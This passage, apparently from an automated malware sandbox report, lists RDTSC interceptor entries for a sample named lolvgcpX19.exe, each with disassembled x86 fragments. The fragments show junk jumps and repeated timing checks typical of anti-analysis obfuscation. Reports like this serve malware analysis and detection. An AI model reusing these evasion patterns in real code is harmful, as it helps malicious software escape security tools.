FFFFFFC8h 0x0000006b jmp 00007F7B9916151Bh 0x00000070 popfd 0x00000071 popad 0x00000072 lock cmpxchg dword ptr [edx], ecx 0x00000076 push eax 0x00000077 push edx 0x00000078 jmp 00007F7B99161525h 0x0000007d rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6DD10E5 second address: 6DD10EB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6DD10EB second address: 6DD10EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6DD10EF second address: 6DD11A0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7B98E54833h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edi 0x0000000c pushad 0x0000000d push esi 0x0000000e pushfd 0x0000000f jmp 00007F7B98E5482Bh 0x00000014 and cl, 0000001Eh 0x00000017 jmp 00007F7B98E54839h 0x0000001c popfd 0x0000001d pop eax 0x0000001e pushfd 0x0000001f jmp 00007F7B98E54831h 0x00000024 and ax, 1E56h 0x00000029 jmp 00007F7B98E54831h 0x0000002e popfd 0x0000002f popad 0x00000030 test eax, eax 0x00000032 jmp 00007F7B98E5482Eh 0x00000037 jne 00007F7C082C2D93h 0x0000003d push eax 0x0000003e push edx 0x0000003f pushad 0x00000040 pushfd 0x00000041 jmp 00007F7B98E5482Dh 0x00000046 or ax, 4266h 0x0000004b jmp 00007F7B98E54831h 0x00000050 popfd 0x00000051 mov edx, eax 0x00000053 popad 0x00000054 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6DD11A0 second address: 6DD11C4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7B9916151Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov edx, dword ptr [ebp+08h] 0x0000000c pushad 0x0000000d mov di, cx 0x00000010 movzx eax, di 0x00000013 popad 0x00000014 mov eax, dword ptr [esi] 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6DD11C4 second address: 6DD11C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6DD11C8 second address: 6DD11E4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7B99161528h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6DD11E4 second address: 6DD11EA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6DD11EA second address: 6DD11EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6DD11EE second address: 6DD11F2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6DD11F2 second address: 6DD124E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [edx], eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F7B99161522h 0x00000013 or ax, 51F8h 0x00000018 jmp 00007F7B9916151Bh 0x0000001d popfd 0x0000001e pushfd 0x0000001f jmp 00007F7B99161528h 0x00000024 adc si, 2C58h 0x00000029 jmp 00007F7B9916151Bh 0x0000002e popfd 0x0000002f popad 0x00000030 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6DD124E second address: 6DD1275 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7B98E54839h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esi+04h] 0x0000000c pushad 0x0000000d mov al, 9Ch 0x0000000f push eax 0x00000010 push edx 0x00000011 push ebx 0x00000012 pop esi 0x00000013 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6DD1275 second address: 6DD12BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov dword ptr [edx+04h], eax 0x00000008 pushad 0x00000009 mov cx, di 0x0000000c pushfd 0x0000000d jmp 00007F7B9916151Fh 0x00000012 or eax, 32114D2Eh 0x00000018 jmp 00007F7B99161529h 0x0000001d popfd 0x0000001e popad 0x0000001f mov eax, dword ptr [esi+08h] 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6DD12BB second address: 6DD12BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6DD12BF second address: 6DD12C3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6DD12C3 second address: 6DD12C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6DD12C9 second address: 6DD1338 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7B99161522h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [edx+08h], eax 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F7B9916151Eh 0x00000013 adc eax, 6F590508h 0x00000019 jmp 00007F7B9916151Bh 0x0000001e popfd 0x0000001f mov edi, eax 0x00000021 popad 0x00000022 mov eax, dword ptr [esi+0Ch] 0x00000025 jmp 00007F7B99161522h 0x0000002a mov dword ptr [edx+0Ch], eax 0x0000002d push eax 0x0000002e push edx 0x0000002f jmp 00007F7B99161527h 0x00000034 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6DD1338 second address: 6DD138D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7B98E54839h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esi+10h] 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov ecx, edx 0x00000011 pushfd 0x00000012 jmp 00007F7B98E5482Fh 0x00000017 sub ax, 18BEh 0x0000001c jmp 00007F7B98E54839h 0x00000021 popfd 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6DD138D second address: 6DD1393 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6DD1393 second address: 6DD13B6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [edx+10h], eax 0x0000000b jmp 00007F7B98E5482Fh 0x00000010 mov eax, dword ptr [esi+14h] 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6DD13B6 second address: 6DD13BC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6DD13BC second address: 6DD13C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6DD13C2 second address: 6DD13C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6DD13C6 second address: 6DD1426 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [edx+14h], eax 0x0000000b jmp 00007F7B98E54830h 0x00000010 mov eax, dword ptr [esi+18h] 0x00000013 jmp 00007F7B98E54830h 0x00000018 mov dword ptr [edx+18h], eax 0x0000001b jmp 00007F7B98E54830h 0x00000020 mov eax, dword ptr [esi+1Ch] 0x00000023 push eax 0x00000024 push edx 0x00000025 pushad 0x00000026 mov bl, C1h 0x00000028 jmp 00007F7B98E54836h 0x0000002d popad 0x0000002e rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6DD1426 second address: 6DD147D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7B9916151Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [edx+1Ch], eax 0x0000000c jmp 00007F7B99161526h 0x00000011 mov eax, dword ptr [esi+20h] 0x00000014 jmp 00007F7B99161520h 0x00000019 mov dword ptr [edx+20h], eax 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007F7B99161527h 0x00000023 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6DD147D second address: 6DD14D9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F7B98E54832h 0x00000009 jmp 00007F7B98E54835h 0x0000000e popfd 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 mov eax, dword ptr [esi+24h] 0x00000015 jmp 00007F7B98E5482Eh 0x0000001a mov dword ptr [edx+24h], eax 0x0000001d jmp 00007F7B98E54830h 0x00000022 mov eax, dword ptr [esi+28h] 0x00000025 push eax 0x00000026 push edx 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6DD14D9 second address: 6DD14DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6DD14DD second address: 6DD14E3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6DD14E3 second address: 6DD14E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6DD14E9 second address: 6DD14ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6DD14ED second address: 6DD1568 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [edx+28h], eax 0x0000000b pushad 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F7B99161526h 0x00000013 and esi, 6C9C7648h 0x00000019 jmp 00007F7B9916151Bh 0x0000001e popfd 0x0000001f pushfd 0x00000020 jmp 00007F7B99161528h 0x00000025 add ax, B8A8h 0x0000002a jmp 00007F7B9916151Bh 0x0000002f popfd 0x00000030 popad 0x00000031 mov di, ax 0x00000034 popad 0x00000035 mov ecx, dword ptr [esi+2Ch] 0x00000038 push eax 0x00000039 push edx 0x0000003a jmp 00007F7B99161521h 0x0000003f rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6DD1568 second address: 6DD15BD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7B98E54831h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [edx+2Ch], ecx 0x0000000c jmp 00007F7B98E5482Eh 0x00000011 mov ax, word ptr [esi+30h] 0x00000015 pushad 0x00000016 pushad 0x00000017 mov si, 9E03h 0x0000001b push ecx 0x0000001c pop ebx 0x0000001d popad 0x0000001e call 00007F7B98E54834h 0x00000023 pushad 0x00000024 popad 0x00000025 pop ecx 0x00000026 popad 0x00000027 mov word ptr [edx+30h], ax 0x0000002b push eax 0x0000002c push edx 0x0000002d pushad 0x0000002e mov ch, dl 0x00000030 popad 0x00000031 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6DD15BD second address: 6DD1622 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, di 0x00000006 mov edx, 68BBE60Eh 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov ax, word ptr [esi+32h] 0x00000012 pushad 0x00000013 pushfd 0x00000014 jmp 00007F7B9916151Bh 0x00000019 sbb ch, FFFFFFBEh 0x0000001c jmp 00007F7B99161529h 0x00000021 popfd 0x00000022 jmp 00007F7B99161520h 0x00000027 popad 0x00000028 mov word ptr [edx+32h], ax 0x0000002c pushad 0x0000002d jmp 00007F7B9916151Eh 0x00000032 push eax 0x00000033 push edx 0x00000034 mov di, ax 0x00000037 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6DD1622 second address: 6DD164F instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F7B98E5482Ch 0x00000008 xor ecx, 2D13AA18h 0x0000000e jmp 00007F7B98E5482Bh 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 popad 0x00000017 mov eax, dword ptr [esi+34h] 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6DD164F second address: 6DD1653 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6DD1653 second address: 6DD1657 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6DD1657 second address: 6DD165D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6DD165D second address: 6DD1662 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6DD1662 second address: 6DD169C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F7B99161526h 0x0000000a sbb cl, FFFFFFA8h 0x0000000d jmp 00007F7B9916151Bh 0x00000012 popfd 0x00000013 popad 0x00000014 pop edx 0x00000015 pop eax 0x00000016 mov dword ptr [edx+34h], eax 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c mov ebx, 5B223D16h 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6DD169C second address: 6DD16A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6DD16A1 second address: 6DD16A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6DD16A7 second address: 6DD1717 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test ecx, 00000700h 0x0000000e jmp 00007F7B98E54830h 0x00000013 jne 00007F7C082C2878h 0x00000019 jmp 00007F7B98E54830h 0x0000001e or dword ptr [edx+38h], FFFFFFFFh 0x00000022 pushad 0x00000023 pushad 0x00000024 jmp 00007F7B98E5482Ch 0x00000029 popad 0x0000002a mov bx, 3144h 0x0000002e popad 0x0000002f or dword ptr [edx+3Ch], FFFFFFFFh 0x00000033 jmp 00007F7B98E54833h 0x00000038 or dword ptr [edx+40h], FFFFFFFFh 0x0000003c push eax 0x0000003d push edx 0x0000003e pushad 0x0000003f movsx ebx, cx 0x00000042 mov ebx, eax 0x00000044 popad 0x00000045 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6DD1717 second address: 6DD1761 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7B99161529h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a pushad 0x0000000b mov esi, 1A6444B3h 0x00000010 pushad 0x00000011 movzx esi, bx 0x00000014 jmp 00007F7B9916151Bh 0x00000019 popad 0x0000001a popad 0x0000001b pop ebx 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007F7B99161520h 0x00000025 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6DD1761 second address: 6DD1765 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6DD1765 second address: 6DD176B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6DD176B second address: 6DD1775 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, 72EA4C83h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6DD1775 second address: 6DD178A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 leave 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F7B9916151Bh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6E20D13 second address: 6E20DAD instructions: 0x00000000 rdtsc 0x00000002 mov bx, cx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 xchg eax, ebp 0x00000009 pushad 0x0000000a call 00007F7B98E54832h 0x0000000f call 00007F7B98E54832h 0x00000014 pop ecx 0x00000015 pop edx 0x00000016 pushfd 0x00000017 jmp 00007F7B98E54830h 0x0000001c sbb ecx, 0C047908h 0x00000022 jmp 00007F7B98E5482Bh 0x00000027 popfd 0x00000028 popad 0x00000029 push eax 0x0000002a jmp 00007F7B98E54839h 0x0000002f xchg eax, ebp 0x00000030 pushad 0x00000031 call 00007F7B98E5482Ch 0x00000036 movzx ecx, di 0x00000039 pop edx 0x0000003a movzx esi, di 0x0000003d popad 0x0000003e mov ebp, esp 0x00000040 push eax 0x00000041 push edx 0x00000042 jmp 00007F7B98E54832h 0x00000047 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6E20DAD second address: 6E20DB3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6E20DB3 second address: 6E20DB7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6D6001B second address: 6D6001F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6D6001F second address: 6D60025 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6D60025 second address: 6D6006B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7B99161524h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F7B9916151Bh 0x0000000f xchg eax, ebp 0x00000010 pushad 0x00000011 mov ah, bl 0x00000013 popad 0x00000014 mov ebp, esp 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F7B99161529h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6D607D8 second address: 6D607DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6D607DC second address: 6D60820 instructions: 0x00000000 rdtsc 0x00000002 mov ebx, eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov cx, 3271h 0x0000000a popad 0x0000000b xchg eax, ebp 0x0000000c jmp 00007F7B9916151Ch 0x00000011 mov ebp, esp 0x00000013 jmp 00007F7B99161520h 0x00000018 pop ebp 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007F7B99161527h 0x00000020 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6D60AB4 second address: 6D60AB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6D60AB8 second address: 6D60ABE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6D60ABE second address: 6D60AC4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6D60AC4 second address: 6D60B0C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7B9916151Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c pushad 0x0000000d mov cx, 5B6Bh 0x00000011 mov ecx, 05F94347h 0x00000016 popad 0x00000017 push eax 0x00000018 jmp 00007F7B9916151Dh 0x0000001d xchg eax, ebp 0x0000001e jmp 00007F7B9916151Eh 0x00000023 mov ebp, esp 0x00000025 push eax 0x00000026 push edx 0x00000027 pushad 0x00000028 pushad 0x00000029 popad 0x0000002a push edi 0x0000002b pop esi 0x0000002c popad 0x0000002d rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6D60B0C second address: 6D60B12 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6D60B12 second address: 6D60B16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6DB0A09 second address: 6DB0A0D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6DB0A0D second address: 6DB0A13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6DB0A13 second address: 6DB0A19 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6DB0A19 second address: 6DB0A9C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7B9916151Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c jmp 00007F7B99161520h 0x00000011 push eax 0x00000012 pushad 0x00000013 mov esi, ebx 0x00000015 mov bl, E5h 0x00000017 popad 0x00000018 xchg eax, ebp 0x00000019 pushad 0x0000001a pushad 0x0000001b pushfd 0x0000001c jmp 00007F7B99161520h 0x00000021 sbb ah, FFFFFFE8h 0x00000024 jmp 00007F7B9916151Bh 0x00000029 popfd 0x0000002a jmp 00007F7B99161528h 0x0000002f popad 0x00000030 mov ecx, 76AEF8E1h 0x00000035 popad 0x00000036 mov ebp, esp 0x00000038 push eax 0x00000039 push edx 0x0000003a jmp 00007F7B99161523h 0x0000003f rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6D90041 second address: 6D90045 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6D90045 second address: 6D90060 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7B99161527h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6D90060 second address: 6D90078 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7B98E54834h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6D90078 second address: 6D9007C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6D9007C second address: 6D900EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F7B98E5482Eh 0x0000000e xchg eax, ebp 0x0000000f pushad 0x00000010 push eax 0x00000011 movsx ebx, si 0x00000014 pop esi 0x00000015 pushfd 0x00000016 jmp 00007F7B98E5482Fh 0x0000001b sbb si, C05Eh 0x00000020 jmp 00007F7B98E54839h 0x00000025 popfd 0x00000026 popad 0x00000027 mov ebp, esp 0x00000029 jmp 00007F7B98E5482Eh 0x0000002e and esp, FFFFFFF0h 0x00000031 push eax 0x00000032 push edx 0x00000033 push eax 0x00000034 push edx 0x00000035 jmp 00007F7B98E5482Ah 0x0000003a rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6D900EB second address: 6D900F1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6D900F1 second address: 6D900F7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\lolvgcpX19.exeRDTSC instruction interceptor: First address: 6D900F7 second address: 6D900FB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
